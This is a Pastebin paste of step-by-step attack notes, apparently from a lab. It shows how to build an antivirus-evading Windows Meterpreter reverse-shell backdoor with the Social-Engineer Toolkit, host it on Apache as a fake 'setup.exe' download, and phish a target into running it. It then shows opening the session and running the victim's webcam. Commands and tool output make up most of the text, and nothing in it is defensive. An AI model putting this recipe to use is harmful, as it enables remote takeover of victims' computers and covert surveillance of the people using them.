API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 26th, 2017
89
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
raw download clone embed print report
  1. Target = Windows 7 = 172.16.254.247
  2.  
  3. Attacker = KALI = 172.16.254.144
  4.  
  5. #############################################################################
  6.  
  7. 1) Preparation of Backdoor
  8.  
  9. a) to prepare a backdoor that doesnt get detected by AntiVirus
  10.  
  11. b) to make the target click on the malicious program to run
  12.  
  13. 2) Prepare a webserver with fake download page
  14.  
  15. ## starting web server
  16.  
  17. root@kali:~# /etc/init.d/apache2 start
  18. [ ok ] Starting apache2 (via systemctl): apache2.service.
  19. root@kali:~#
  20.  
  21. ### making a folder downloadable for the malware
  22.  
  23. mkdir /var/www/html/malware
  24.  
  25. open firefox and test it with http://localhost/malware
  26.  
  27. step 3) prepare the backdoor
  28.  
  29. setoolkit
  30.  
  31. press Y agree
  32.  
  33. Please update SET to the latest before submitting any git issues.
  34.  
  35.  
  36. Select from the menu:
  37.  
  38. 1) Social-Engineering Attacks
  39. 2) Penetration Testing (Fast-Track)
  40. 3) Third Party Modules
  41. 4) Update the Social-Engineer Toolkit
  42. 5) Update SET configuration
  43. 6) Help, Credits, and About
  44.  
  45. 99) Exit the Social-Engineer Toolkit
  46.  
  47. press 1 > 4
  48.  
  49. select 2
  50.  
  51. 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
  52.  
  53. set:payloads> IP address for the payload listener (LHOST):
  54.  
  55. for LHOST use your IP 172.16.254.144
  56.  
  57. set Listener to 8888
  58.  
  59. set:payloads> Enter the PORT for the reverse listener:8888
  60.  
  61. set:payloads> Do you want to start the payload and listener now? (yes/no):
  62.  
  63. answer yes
  64.  
  65. malware is located under
  66.  
  67. [*] Payload has been exported to the default SET directory located under: /root/.set//payload.exe
  68.  
  69. 3) Move the malware from the default set directory to malware directory of apache2
  70.  
  71. # to move the payload (backdoor ) into the apache2 malware directory
  72. root@kali:~# mv /root/.set/payload.exe /var/www/html/malware/
  73.  
  74.  
  75. #rename the payload.exe as setup.exe
  76. root@kali:~# mv /var/www/html/malware/payload.exe /var/www/html/malware/setup.exe
  77.  
  78. 4) make sure the setoolkit terminal is still running
  79.  
  80. phish your target to download the file
  81.  
  82.  
  83. once the setup.exe is already run.. you will notice a session on metasploit handler
  84.  
  85.  
  86. sessions -i @## to view the list of sessions established
  87.  
  88. msf exploit(handler) > sessions -i
  89.  
  90. Active sessions
  91. ===============
  92.  
  93. Id Type Information Connection
  94. -- ---- ----------- ----------
  95. 1 meterpreter x86/windows WIN-4RS5II4B5T0\Reverse @ WIN-4RS5II4B5T0 172.16.254.144:8888 -> 172.16.254.247:49195 (172.16.254.247)
  96.  
  97. msf exploit(handler) > sessions -i 1 ## to establish connection with id 1
  98.  
  99. run webcam
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!